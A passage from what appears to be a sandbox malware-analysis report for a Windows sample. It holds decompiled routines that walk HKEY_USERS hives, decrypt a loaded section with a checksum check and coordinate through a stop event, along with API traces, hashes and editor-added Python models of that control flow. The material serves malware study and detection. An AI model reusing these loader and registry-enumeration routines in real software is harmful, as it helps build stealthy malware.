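            raise RuntimeError("query script promised bytes the body does not contain")
        self.offset += len(chunk)
        return True, chunk


def read_response_body(req, stop_signaled=lambda: False):
    """Mirror of E00DD4182's control flow. Returns (status, body or None).

    (0, None) is the path where the original only clears ctx+0x30; a body is
    returned only when status is 0, matching the guard on the E00DD44D1 call.
    """
    ok, avail = req.query_data_available()
    if not ok:
        # Only CONNECTION_ERROR on the very first query is tolerated; it is
        # treated like "nothing to read".
        if req.last_error != ERROR_CONNECTION_ABORTED:
            return req.last_error, None
        return 0, None
    if avail == 0:
        return 0, None

    stream = bytearray()  # the COM stream written through vtable slot +0x10
    status = 0
    while True:
        # L4: drain what the last query reported, at most 0x1000 bytes per read
        while avail:
            ok, chunk = req.read_data(min(avail, CHUNK))
            if not ok:
                status = req.last_error  # kept unless the re-query below clears it
                break
            stream += chunk
            avail -= len(chunk)
        # L10: non-blocking poll of the global stop event; signalled means abort with 0x102
        if stop_signaled():
            status = WAIT_TIMEOUT
            break
        ok, pending = req.query_data_available()
        if ok:
            avail = pending
        else:
            status = req.last_error
            # INVALID_SERVER_RESPONSE with nothing still pending is the normal end
            # of body; any other failure here, 0x2EFE included, is returned as an error.
            if status != ERROR_INVALID_SERVER_RESPONSE or avail != 0:
                break
            status = 0
        if avail == 0:  # L15: loop back to L4 only while bytes are pending
            break
    # L18/L21: free the buffer, hand the stream to E00DD44D1 only if status == 0,
    # then release the stream. The handler is not modelled; its input is returned.
    return status, (bytes(stream) if status == 0 else None)


if __name__ == "__main__":
    body = bytes(range(256)) * 37  # constructed 0x2500-byte body: three reads of the loop
    status, data = read_response_body(FakeRequest(body, [0x2500, 0]))
    print(hex(status), len(data))
```

The scripts in the tests below are where the model earns its keep: the same error code is fatal or harmless depending on where in the loop it appears, which is exactly the kind of detail a detour through the goto-heavy listing makes easy to misread.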

                                                            APIs
                                                            • SysAllocString.OLEAUT32(80000002), ref: 00DD573A
                                                            • SysAllocString.OLEAUT32(00DD5BA8), ref: 00DD577D
                                                            • SysFreeString.OLEAUT32(00000000), ref: 00DD5791
                                                            • SysFreeString.OLEAUT32(00000000), ref: 00DD579F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
                                                             • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
                                                             • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
                                                             • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: String$AllocFree
                                                            • String ID:
                                                            • API String ID: 344208780-0
                                                            • Opcode ID: 3f283654bfdaa20e896d833e2d028efd4bd9d2beb68e8f54e10798a5e6b25e71
                                                            • Instruction ID: c5a14932d333ed25cfb1dccd64d8e5f307ea9ada82058f0c13567b8e6a52e55e
                                                            • Opcode Fuzzy Hash: 3f283654bfdaa20e896d833e2d028efd4bd9d2beb68e8f54e10798a5e6b25e71
                                                            • Instruction Fuzzy Hash: 0731F875900609EF8B05DF98E8C48AEBBB9FF48340B24842FE50A97350E7359A45CFB5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
			E00DD4560(void* __ecx, intOrPtr _a4) {
				int* _v8;       // subkey index, passed by address to E00DD5AFA
				int _v12;       // name-buffer size in, name length out
				int* _v16;
				int _v20;
				int* _v24;      // secondary buffer handed to E00DD5AFA; never allocated on the paths reachable in this listing
				char* _v28;     // subkey-name buffer
				void* _v32;     // open HKEY_USERS handle
				long _t33;
				char* _t35;
				long _t39;
				long _t42;
				intOrPtr _t47;
				void* _t51;
				long _t53;

				_t51 = __ecx;
				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				_v24 = 0;
				_t33 = RegOpenKeyExA(0x80000003, 0, 0, 0x20019,  &_v32); // executed; HKEY_USERS, no subkey, KEY_READ: the root under which every loaded user hive (HKU\<SID>) sits
				_t53 = _t33;
				if(_t53 != 0) {
					L18:
					return _t53;
				}
				_t53 = 8; // ERROR_NOT_ENOUGH_MEMORY, in case the allocation below fails
				_t35 = E00DD77D7(0x104); // MAX_PATH-byte name buffer (heap, see APIs)
				_v28 = _t35;
				if(_t35 == 0) {
					L17:
					RegCloseKey(_v32);
					goto L18;
				}
				_v20 = 0x104;
				do {
					_v16 = _v20;
					_v12 = 0x104;
					_t39 = RegEnumKeyExA(_v32, _v8, _v28,  &_v12, 0, 0, 0, 0); // executed; name of the subkey at index _v8
					_t53 = _t39;
					if(_t53 != 0xea) { // ERROR_MORE_DATA: the name did not fit in 0x104 bytes
						if(_t53 != 0) {
							L14:
							if(_t53 == 0x103) { // ERROR_NO_MORE_ITEMS: end of the enumeration is reported as success
								_t53 = 0;
							}
							L16:
							E00DD77EC(_v28); // free the name buffer
							goto L17;
						}
						_t42 = E00DD5AFA(_t51, _v32, _v28, _v24, _v12,  &_v8, _a4); // executed; per-subkey handler; it gets the index by address because this loop does not increment it on this path
						_t53 = _t42;
						if(_t53 != 0) {
							goto L14;
						}
						goto L12;
					}
					if(_v12 <= 0x104) {
						if(_v16 <= _v20) { // always true here (_v16 was just set to _v20): the walk ends with ERROR_MORE_DATA and the reallocation below is unreachable in this listing
							goto L16;
						}
						E00DD77EC(_v24);
						_v20 = _v16;
						_t47 = E00DD77D7(_v16);
						_v24 = _t47;
						if(_t47 != 0) {
							L6:
							_t53 = 0;
							goto L12;
						}
						_t53 = 8;
						goto L16;
					}
					_v8 = _v8 + 1; // name reported longer than the buffer: skip this index
					goto L6;
					L12:
				} while (WaitForSingleObject( *0xdda2c4, 0) == 0x102); // keep going only while the global stop event is not signalled (WAIT_TIMEOUT)
				goto L16;
			}

                                                             Instruction-address column for E00DD4560 (the disassembly text itself did not survive extraction); the mapped addresses run from 0x00dd4560 to 0x00dd466e.

                                                            APIs
                                                            • RegOpenKeyExA.KERNELBASE(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,00DD17B3,?), ref: 00DD4586
                                                              • Part of subcall function 00DD77D7: RtlAllocateHeap.NTDLL(00000000,00000000,00DD1275), ref: 00DD77E3
                                                            • RegEnumKeyExA.KERNELBASE(?,?,?,00DD17B3,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,00DD17B3), ref: 00DD45CD
                                                            • WaitForSingleObject.KERNEL32(00000000,?,?,?,00DD17B3,?,00DD17B3,?,?,?,?,?,00DD17B3,?), ref: 00DD463A
                                                            • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,00DD17B3,?,?,?,?,?,00DD6E29,?), ref: 00DD4662
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
                                                             • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
                                                             • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
                                                             • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: AllocateCloseEnumHeapObjectOpenSingleWait
                                                            • String ID:
                                                            • API String ID: 3664505660-0
                                                            • Opcode ID: 0fc7e6bc9dd70f7791d343e4dce53fbf76cb56a3190bd4bed61c53904f00aada
                                                            • Instruction ID: e13d6d94655959c6dabc418cdfeebb7e46086e67379ab5b29b1b09022b4ea31e
                                                            • Opcode Fuzzy Hash: 0fc7e6bc9dd70f7791d343e4dce53fbf76cb56a3190bd4bed61c53904f00aada
                                                            • Instruction Fuzzy Hash: 9A311875C00219EBCF21AFA9DC859EEFFB9EB95310F144067E562B2260D2718E50DBB1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%
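
The enumeration contract of E00DD4560, reconstructed in Python as an added editor's example; this is not code from the sample or from the report. FakeRegistry is a constructed in-memory stand-in for RegOpenKeyExA, RegEnumKeyExA and RegCloseKey that answers with the same Win32 status codes the function tests, and per_key stands in for E00DD5AFA, whose behaviour the report does not show beyond its argument list. Two things the listing shows and the model preserves: the loop never advances the index on the success path, so the per-key callee (which receives the index by address) has to do it, and ERROR_NO_MORE_ITEMS is mapped to success while a signalled stop event ends the walk early with status 0. What the length field holds after ERROR_MORE_DATA is a modelling choice here (the length the name would need), because the listing's branch on that value decides whether an over-long name is skipped or ends the walk.

```python
"""Python model of the HKEY_USERS subkey walk decompiled as E00DD4560.

Editor's added example; the registry below is a constructed fake, not the
Windows API, and per_key stands in for the subcall E00DD5AFA.
"""

HKEY_USERS = 0x80000003
KEY_READ = 0x20019
MAX_PATH = 0x104            # size of the subkey-name buffer the function allocates
ERROR_SUCCESS = 0
ERROR_FILE_NOT_FOUND = 2
ERROR_NOT_ENOUGH_MEMORY = 8
ERROR_MORE_DATA = 0xEA
ERROR_NO_MORE_ITEMS = 0x103
WAIT_TIMEOUT = 0x102


class FakeRegistry:
    """Constructed stand-in for RegOpenKeyExA / RegEnumKeyExA / RegCloseKey."""

    def __init__(self, user_subkeys, open_status=ERROR_SUCCESS):
        self.user_subkeys = list(user_subkeys)  # HKU\<SID> names in enumeration order
        self.open_status = open_status          # forced result of RegOpenKeyExA
        self.open_handles = 0

    def open_key(self, root, access):
        if self.open_status != ERROR_SUCCESS or root != HKEY_USERS:
            return (self.open_status or ERROR_FILE_NOT_FOUND), None
        self.open_handles += 1
        return ERROR_SUCCESS, "HKU"

    def enum_key(self, handle, index, buf_size):
        """RegEnumKeyExA: (status, name, reported_len). ERROR_MORE_DATA when the
        name plus its NUL does not fit; reported_len is then the length needed
        (a modelling choice, see lead-in)."""
        if index >= len(self.user_subkeys):
            return ERROR_NO_MORE_ITEMS, None, 0
        name = self.user_subkeys[index]
        if len(name) + 1 > buf_size:
            return ERROR_MORE_DATA, None, len(name)
        return ERROR_SUCCESS, name, len(name)

    def close_key(self, handle):
        self.open_handles -= 1
        return ERROR_SUCCESS


def walk_hkey_users(reg, per_key, caller_arg, stop_signaled=lambda: False):
    """Control flow of E00DD4560; returns the Win32 status the original returns.

    per_key(handle, name, index, caller_arg) models E00DD5AFA(ctx, hkey, name,
    _v24, _v12, &_v8, _a4): it gets the index as a one-element list and must
    advance it itself, because this loop only increments the index when it
    skips an over-long name.
    """
    status, hkey = reg.open_key(HKEY_USERS, KEY_READ)
    if status != ERROR_SUCCESS:
        return status
    index = [0]  # _v8, passed by address to per_key
    while True:
        status, name, reported = reg.enum_key(hkey, index[0], MAX_PATH)
        if status == ERROR_MORE_DATA:
            if reported <= MAX_PATH:
                break  # the listing falls through to cleanup and returns 0xEA
            index[0] += 1  # name longer than the buffer: skip it
            status = ERROR_SUCCESS
        elif status != ERROR_SUCCESS:
            if status == ERROR_NO_MORE_ITEMS:
                status = ERROR_SUCCESS  # end of enumeration is not an error
            break
        else:
            status = per_key(hkey, name, index, caller_arg)
            if status != ERROR_SUCCESS:
                if status == ERROR_NO_MORE_ITEMS:
                    status = ERROR_SUCCESS
                break
        # L12: keep going only while the global stop event is not signalled
        if stop_signaled():
            break
    reg.close_key(hkey)
    return status


def collect_sids(seen):
    """A per-key stand-in that records each HKU subkey name and advances the index."""
    def per_key(hkey, name, index, caller_arg):
        seen.append(name)
        index[0] += 1
        return ERROR_SUCCESS
    return per_key


if __name__ == "__main__":
    names = []  # constructed HKU layout: default hive, SYSTEM, one interactive user and its _Classes hive
    reg = FakeRegistry([".DEFAULT", "S-1-5-18", "S-1-5-21-1-2-3-1001", "S-1-5-21-1-2-3-1001_Classes"])
    print(hex(walk_hkey_users(reg, collect_sids(names), None)), names)
```

A per-key callee that forgets to bump the index would make the original re-enumerate the same subkey until the stop event fires; the one-element list in the model makes that contract visible instead of hiding it in a pointer argument.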

                                                            C-Code - Quality: 86%
                                                            			E6E4B18A0(void* __edi, intOrPtr _a4) {
                                                            				signed int _v8;
                                                            				intOrPtr _v12;
                                                            				unsigned int _v16;
                                                            				intOrPtr _v20;
                                                            				char _v24;
                                                            				void* _v28;
                                                            				intOrPtr _v32;
                                                            				intOrPtr _v36;
                                                            				void* _v40;
                                                            				signed int _v48;
                                                            				signed int _v52;
                                                            				intOrPtr _t46;
                                                            				void* _t53;
                                                            				intOrPtr _t54;
                                                            				intOrPtr _t57;
                                                            				signed int _t66;
                                                            				intOrPtr _t68;
                                                            				intOrPtr _t83;
                                                            				void* _t84;
                                                            
                                                            				_t83 =  *0x6e4b41b0;
                                                            				_t46 = E6E4B1C00(_t83,  &_v24,  &_v16);
                                                            				_v20 = _t46;
                                                            				if(_t46 == 0) {
                                                            					asm("sbb ebx, ebx");
                                                            					_t66 =  ~( ~(_v16 & 0x00000fff)) + (_v16 >> 0xc);
                                                            					_t84 = _t83 + _v24;
                                                            					_v40 = _t84;
                                                            					_t53 = VirtualAlloc(0, _t66 << 0xc, 0x3000, 4); // executed
                                                            					_v28 = _t53;
                                                            					if(_t53 == 0) {
                                                            						_v20 = 8;
                                                            					} else {
                                                            						_v8 = _v8 & 0x00000000;
                                                            						if(_t66 <= 0) {
                                                            							_t54 =  *0x6e4b41cc;
                                                            						} else {
                                                            							_t68 = _a4;
                                                            							_t57 = _t53 - _t84;
                                                            							_t13 = _t68 + 0x6e4b5137; // 0x6e4b5137
                                                            							_v32 = _t57;
                                                            							_v36 = _t57 + _t13;
                                                            							_v12 = _t84;
                                                            							while(1) {
                                                            								asm("movsd");
                                                            								asm("movsd");
                                                            								asm("movsd");
                                                            								E6E4B116D(_v12 + _t57, _v12, (_v52 ^ _v48) - _v8 + _v24 + _a4 - 1, 0x400);
                                                            								_v12 = _v12 + 0x1000;
                                                            								_t54 =  *((intOrPtr*)(_v36 + 0xc)) -  *((intOrPtr*)(_v36 + 8)) +  *((intOrPtr*)(_v36 + 4));
                                                            								_v8 = _v8 + 1;
                                                            								 *0x6e4b41cc = _t54;
                                                            								if(_v8 >= _t66) {
                                                            									break;
                                                            								}
                                                            								_t57 = _v32;
                                                            							}
                                                            						}
                                                            						if(_t54 != 0x69b25f44) {
                                                            							_v20 = 9;
                                                            						} else {
                                                            							memcpy(_v40, _v28, _v16);
                                                            						}
                                                            						VirtualFree(_v28, 0, 0x8000); // executed
                                                            					}
                                                            				}
                                                            				return _v20;
                                                            			}


                                                            APIs
                                                            • VirtualAlloc.KERNELBASE(00000000,6E4B1A70,00003000,00000004,?,?,6E4B1A70,00000001), ref: 6E4B18F6
                                                            • memcpy.NTDLL(?,?,6E4B1A70,?,?,6E4B1A70,00000001), ref: 6E4B1991
                                                            • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,6E4B1A70,00000001), ref: 6E4B19AC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1185181412.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
                                                            • Associated: 00000000.00000002.1185112968.000000006E4B0000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1185264812.000000006E4B3000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1185310564.000000006E4B5000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1185336391.000000006E4B6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: Virtual$AllocFreememcpy
                                                            • String ID: Sep 20 2021
                                                            • API String ID: 4010158826-2355132765
                                                            • Opcode ID: 1fc53ced827f22c971cbebc2d29e3cbd98533e2dd047f4e1f6e59b20473b0aa7
                                                            • Instruction ID: debdd4d92c4862c0e1f9f10a5b811b2dd8b46e83e87ed80a08c83434ea008124
                                                            • Opcode Fuzzy Hash: 1fc53ced827f22c971cbebc2d29e3cbd98533e2dd047f4e1f6e59b20473b0aa7
                                                            • Instruction Fuzzy Hash: B0310E71D00219AFDB00DFE9D884FEEB7B9FF15344F104169E915A7241D7B1AA06CBA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 41%
                                                            			E00DD1723(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                                            				intOrPtr _v12;
                                                            				void* _v16;
                                                            				void* _v28;
                                                            				char _v32;
                                                            				void* __esi;
                                                            				void* _t20;
                                                            				void* _t26;
                                                            				void* _t29;
                                                            				void* _t38;
                                                            				signed int* _t39;
                                                            				void* _t40;
                                                            
                                                            				_t36 = __ecx;
                                                            				_v32 = 0;
                                                            				asm("stosd");
                                                            				asm("stosd");
                                                            				asm("stosd");
                                                            				asm("stosd");
                                                            				asm("stosd");
                                                            				_v12 = _a4;
                                                            				_t20 = E00DD5909(__ecx,  &_v32); // executed
                                                            				_t38 = _t20;
                                                            				if(_t38 != 0) {
                                                            					L12:
                                                            					_t39 = _a8;
                                                            					L13:
                                                            					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                                                            						_t23 =  &(_t39[1]);
                                                            						if(_t39[1] != 0) {
                                                            							E00DD3910(_t23);
                                                            						}
                                                            					}
                                                            					return _t38;
                                                            				}
                                                            				_t26 = E00DD1FBC(0x40,  &_v16); // executed
                                                            				if(_t26 != 0) {
                                                            					_v16 = 0;
                                                            				}
                                                            				_t40 = CreateEventA(0xdda2f8, 1, 0,  *0xdda394);
                                                            				if(_t40 != 0) {
                                                            					SetEvent(_t40);
                                                            					Sleep(0xbb8); // executed
                                                            					CloseHandle(_t40);
                                                            				}
                                                            				_push( &_v32);
                                                            				if(_a12 == 0) {
                                                            					_t29 = E00DD4560(_t36); // executed
                                                            				} else {
                                                            					_push(0);
                                                            					_push(0);
                                                            					_push(0);
                                                            					_push(0);
                                                            					_push(0);
                                                            					_t29 = E00DD5AFA(_t36);
                                                            				}
                                                            				_t41 = _v16;
                                                            				_t38 = _t29;
                                                            				if(_v16 != 0) {
                                                            					E00DD44B9(_t41);
                                                            				}
                                                            				if(_t38 != 0) {
                                                            					goto L12;
                                                            				} else {
                                                            					_t39 = _a8;
                                                            					_t38 = E00DD43C6( &_v32, _t39);
                                                            					goto L13;
                                                            				}
                                                            			}


                                                            APIs
                                                            • CreateEventA.KERNEL32(00DDA2F8,00000001,00000000,00000040,?,?,73BCF710,00000000,73BCF730,?,?,?,?,00DD6E29,?,00000001), ref: 00DD1774
                                                            • SetEvent.KERNEL32(00000000,?,?,?,?,00DD6E29,?,00000001,00DD5FE7,00000002,?,?,00DD5FE7), ref: 00DD1781
                                                            • Sleep.KERNELBASE(00000BB8,?,?,?,?,00DD6E29,?,00000001,00DD5FE7,00000002,?,?,00DD5FE7), ref: 00DD178C
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00DD6E29,?,00000001,00DD5FE7,00000002,?,?,00DD5FE7), ref: 00DD1793
                                                              • Part of subcall function 00DD4560: RegOpenKeyExA.KERNELBASE(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,00DD17B3,?), ref: 00DD4586
                                                              • Part of subcall function 00DD4560: RegEnumKeyExA.KERNELBASE(?,?,?,00DD17B3,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,00DD17B3), ref: 00DD45CD
                                                              • Part of subcall function 00DD4560: WaitForSingleObject.KERNEL32(00000000,?,?,?,00DD17B3,?,00DD17B3,?,?,?,?,?,00DD17B3,?), ref: 00DD463A
                                                              • Part of subcall function 00DD4560: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,00DD17B3,?,?,?,?,?,00DD6E29,?), ref: 00DD4662
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: CloseEvent$CreateEnumHandleObjectOpenSingleSleepWait
                                                            • String ID:
                                                            • API String ID: 891522397-0
                                                            • Opcode ID: 3fde4bd25a97ce9200662c47f9257ec77b23916c9019e16bb2df7d2cac91420f
                                                            • Instruction ID: 936bc8378f1942143da7ad8246c8f9a7486c7350a62e5c6d8926e427cb2d61d1
                                                            • Opcode Fuzzy Hash: 3fde4bd25a97ce9200662c47f9257ec77b23916c9019e16bb2df7d2cac91420f
                                                            • Instruction Fuzzy Hash: 2721837A900219FBCB10AFE9D8819EEB3B9EB44350B154527FA11E7310D7759D448BB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00DD15D7(int _a4, int _a8, void* _a12, short* _a16, char** _a20, intOrPtr* _a24) {
                                                            				long _t26;
                                                            				intOrPtr* _t38;
                                                            				char* _t42;
                                                            				long _t43;
                                                            
                                                            				if(_a4 == 0) {
                                                            					L2:
                                                            					_t26 = RegOpenKeyW(_a8, _a12,  &_a12); // executed
                                                            					_t43 = _t26;
                                                            					if(_t43 == 0) {
                                                            						RegQueryValueExW(_a12, _a16, 0,  &_a8, 0,  &_a4); // executed
                                                            						if(_a4 == 0) {
                                                            							_t43 = 0xe8;
                                                            						} else {
                                                            							_t42 = E00DD77D7(_a4);
                                                            							if(_t42 == 0) {
                                                            								_t43 = 8;
                                                            							} else {
                                                            								_t43 = RegQueryValueExW(_a12, _a16, 0,  &_a8, _t42,  &_a4);
                                                            								if(_t43 != 0) {
                                                            									E00DD77EC(_t42);
                                                            								} else {
                                                            									 *_a20 = _t42;
                                                            									_t38 = _a24;
                                                            									if(_t38 != 0) {
                                                            										 *_t38 = _a4;
                                                            									}
                                                            								}
                                                            							}
                                                            						}
                                                            						RegCloseKey(_a12);
                                                            					}
                                                            					L12:
                                                            					return _t43;
                                                            				}
                                                            				_t43 = E00DD3F0E(_a4, _a8, _a12, _a16, _a20, _a24);
                                                            				if(_t43 == 0) {
                                                            					goto L12;
                                                            				}
                                                            				goto L2;
                                                            			}


                                                            APIs
                                                            • RegOpenKeyW.ADVAPI32(80000002,039C9DF4,039C9DF4), ref: 00DD1610
                                                            • RegQueryValueExW.KERNELBASE(039C9DF4,?,00000000,80000002,00000000,00000000,?,00DD5BD9,3D00DD90,80000002,00DD17B3,00000000,00DD17B3,?,039C9DF4,80000002), ref: 00DD1632
                                                            • RegQueryValueExW.ADVAPI32(039C9DF4,?,00000000,80000002,00000000,00000000,00000000,?,00DD5BD9,3D00DD90,80000002,00DD17B3,00000000,00DD17B3,?,039C9DF4), ref: 00DD1657
                                                            • RegCloseKey.ADVAPI32(039C9DF4,?,00DD5BD9,3D00DD90,80000002,00DD17B3,00000000,00DD17B3,?,039C9DF4,80000002,00000000,?), ref: 00DD1687
                                                              • Part of subcall function 00DD3F0E: SafeArrayDestroy.OLEAUT32(00000000), ref: 00DD3F93
                                                              • Part of subcall function 00DD77EC: RtlFreeHeap.NTDLL(00000000,00000000,00DD1333,00000000,00000000,?,00000000,?,?,?,?,?,00DD66B0,00000000,?,00000001), ref: 00DD77F8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: QueryValue$ArrayCloseDestroyFreeHeapOpenSafe
                                                            • String ID:
                                                            • API String ID: 486277218-0
                                                            • Opcode ID: 55338c11bdead840d70969fcb670777222f2204a172104785f01397502580d50
                                                            • Instruction ID: 3755e45ad627d75576db1c968a73c528f465ac55a21609437a955d3e482b5146
                                                            • Opcode Fuzzy Hash: 55338c11bdead840d70969fcb670777222f2204a172104785f01397502580d50
                                                            • Instruction Fuzzy Hash: F321F57A40015EBFCF11AF94DC80CEA7BA9EB18390B098527FE1597260D632DD64DBB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RegQueryValueExA.KERNELBASE(045722F6,?,00000000,045722F6,00000000,04572306,045722F6,?,?,?,?,0457ABF7,80000001,?,045722F6,04572306), ref: 0457DAE7
                                                            • RtlAllocateHeap.NTDLL(00000000,04572306,00000000), ref: 0457DAFE
                                                            • HeapFree.KERNEL32(00000000,00000000,?,0457ABF7,80000001,?,045722F6,04572306,?,0457AB63,80000001,?,045722F6), ref: 0457DB19
                                                            • RegQueryValueExA.KERNELBASE(045722F6,?,00000000,045722F6,00000000,04572306,?,0457ABF7,80000001,?,045722F6,04572306,?,0457AB63,80000001), ref: 0457DB38
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: HeapQueryValue$AllocateFree
                                                            • String ID:
                                                            • API String ID: 4267586637-0
                                                            • Opcode ID: addab05c389906af868676f07cb025d065792e1780b31c55759d9175a8ec8382
                                                            • Instruction ID: 2d1351105f9fd9ee69f85104d01d76d2f364ef570b371c2f9a67cbe39d6458eb
                                                            • Opcode Fuzzy Hash: addab05c389906af868676f07cb025d065792e1780b31c55759d9175a8ec8382
                                                            • Instruction Fuzzy Hash: 68111FB6500118FFDB12DF95EC84CEEBBBDFB89750B104066F905A6210D671AE44EF60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                            • GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,0458C140,00000000,0456AD03,?,0456D280,?), ref: 0456C606
                                                            • PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,0458C140,00000000,0456AD03,?,0456D280,?), ref: 0456C611
                                                            • _wcsupr.NTDLL ref: 0456C61E
                                                            • lstrlenW.KERNEL32(00000000), ref: 0456C626
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: FileName$AllocateFindHeapImagePathProcess_wcsuprlstrlen
                                                            • String ID:
                                                            • API String ID: 2533608484-0
                                                            • Opcode ID: f6561c688790c9e64bd697b6fbb9b55fe531d50f39fa6df9ef3c6238c7aad122
                                                            • Instruction ID: 9a9eb9bb24533da548e4d423d17af55bfe94d170a04fa6f8eeb002c5efa9cd89
                                                            • Opcode Fuzzy Hash: f6561c688790c9e64bd697b6fbb9b55fe531d50f39fa6df9ef3c6238c7aad122
                                                            • Instruction Fuzzy Hash: 88F0B4311011125AA3136B3C6C88A6F666DFF90B65B10953DF843E2140CE59EC05F2A8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0456D19D
                                                              • Part of subcall function 045700CA: RtlEnterCriticalSection.NTDLL(00000000), ref: 045700D6
                                                              • Part of subcall function 045700CA: CloseHandle.KERNEL32(?), ref: 045700E4
                                                              • Part of subcall function 045700CA: RtlLeaveCriticalSection.NTDLL(00000000), ref: 04570100
                                                            • CloseHandle.KERNEL32(?), ref: 0456D1AB
                                                            • InterlockedDecrement.KERNEL32(0458BFFC), ref: 0456D1BA
                                                              • Part of subcall function 04583A70: SetEvent.KERNEL32(000003BC,0456D1D5), ref: 04583A7A
                                                              • Part of subcall function 04583A70: CloseHandle.KERNEL32(000003BC), ref: 04583A8F
                                                              • Part of subcall function 04583A70: HeapDestroy.KERNELBASE(045C0000), ref: 04583A9F
                                                            • RtlExitUserThread.NTDLL(00000000), ref: 0456D1D6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: CloseHandle$CriticalSection$DecrementDestroyEnterEventExitHeapInterlockedLeaveMultipleObjectsThreadUserWait
                                                            • String ID:
                                                            • API String ID: 1141245775-0
                                                            • Opcode ID: 45fff90680b88b981e1413c993e3a7b254a237574c634bf3d557f92dd838ef23
                                                            • Instruction ID: 6ba533145639c92101ac05513628bff361d87e819996eed0c48aa68abbcc99ce
                                                            • Opcode Fuzzy Hash: 45fff90680b88b981e1413c993e3a7b254a237574c634bf3d557f92dd838ef23
                                                            • Instruction Fuzzy Hash: EFF06830601604AFD7016F689C49F6A3B79FB46734F10065CF516B72C0DFB8AD05AB64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 87%
                                                            			E6E4B1FC9(void* __ecx, intOrPtr _a4) {
                                                            				long _t3;
                                                            				int _t4;
                                                            				int _t9;
                                                            				void* _t13;
                                                            
                                                            				_t13 = GetCurrentThread();
                                                            				_t3 = SetThreadAffinityMask(_t13, 1); // executed
                                                            				if(_t3 != 0) {
                                                            					SetThreadPriority(_t13, 0xffffffff); // executed
                                                            				}
                                                            				_t4 = E6E4B1A1C(_a4); // executed
                                                            				_t9 = _t4;
                                                            				if(_t9 == 0) {
                                                            					SetThreadPriority(_t13, _t4); // executed
                                                            				}
                                                            				asm("lock xadd [eax], ecx");
                                                            				return _t9;
                                                            			}

                                                            0x6e4b1fd2
                                                            0x6e4b1fd7
                                                            0x6e4b1fe5
                                                            0x6e4b1fea
                                                            0x6e4b1fea
                                                            0x6e4b1ff0
                                                            0x6e4b1ff5
